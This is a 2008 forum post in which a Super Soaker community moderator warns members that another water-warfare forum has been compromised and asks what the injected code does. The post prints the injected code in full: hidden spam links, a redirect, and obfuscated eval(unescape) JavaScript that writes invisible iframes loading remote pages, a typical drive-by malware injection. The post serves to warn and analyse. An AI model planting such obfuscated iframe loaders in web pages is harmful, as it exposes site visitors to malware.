Go Back   Super Soaker Central > Water guns > Community
User Name
Password
Register FAQ Members List Calendar Mark Forums Read


Welcome to the SSC Forums! You are currently viewing our boards as a guest which gives you limited access. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and more. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact contact us.
Reply
 
Thread Tools
Old 02-10-2008, 08:10 AM   #1
isoaker_com
Super Moderator
 
isoaker_com's Avatar
 
Join Date: Oct 2004
Location: Somewhere
Posts: 241
UserID: 301
Default Problems at WaterWarfare.com

I meant to post this here yesterday, but got caught up in things. As the problem is still around presently, I've opted to post this here as well since some of you guys might have some ideas on what the heck this is:

Be wary when visiting the WaterWarfare.com forums currently. There seems to be some odd script that's been inserted into the forums and I'm really not sure what it's doing exactly, but it is trying to access sites with .cn and .ru addresses. I noticed an odd URL attempting to load when browsing WWc's main forum page, opened up AdAware, and noticed a bunch of odd addresses there.

Anyone know what this does apart from autoloading Google.com with potentially some invisible frames still running?
Code:
<META http-equiv=Refresh content='0; URL=http://google.com'><div style='display:none'><a href='http://xaknet.ru'>взлом</a> <a href='http://forum.xaknet.ru'>взломать</a></div><script type='text/javascript'> <!-- var msg=314,d=document; eval(unescape ('%20%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%32%33%38%39%62%61%36%32%37%65%61%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%72%61%6d%6f%6e%65%79%6d%61%79%6b%65%72%2e%63%6e%2f%61%6c%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%35%31%32%36%30%29%2b%27%66%31%62%62%5c%27%20%77%69%64%74%68%3d%32%33%33%20%68%65%69%67%68%74%3d%32%32%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%3e%27%29') ); //--> </script> <iframe src='http://lskdfjlerjvm.com/arm2/index.php' width='1' height='1' style='visibility: hidden;'></iframe><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%31%63%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6c%73%6b%64%66%6a%6c%65%72%6a%76%6d%2e%63%6f%6d%2f%61%72%6d%32%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%39%37%32%30%29%2b%27%33%65%35%5c%27%20%77%69%64%74%68%3d%31%36%32%20%68%65%69%67%68%74%3d%36%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

This is from the following URL that has been injected into WWc:
Code:
http://tatiana-restaurant.com/photogallery14602/index.php

I do not recommend visiting that site unless you know what you might be getting yourself into. In fact, if you have an AdBlocking program, I'd recommend adding that site to it.

__________________
:: Leave NO one dry! :: iSoaker.com ::
isoaker_com is offline   Reply With Quote
Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off


All times are GMT -5. The time now is 09:49 AM.


Powered by vBulletin
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 2.2.2
Copyright ©2003 - 2008 The Super Soaker Central project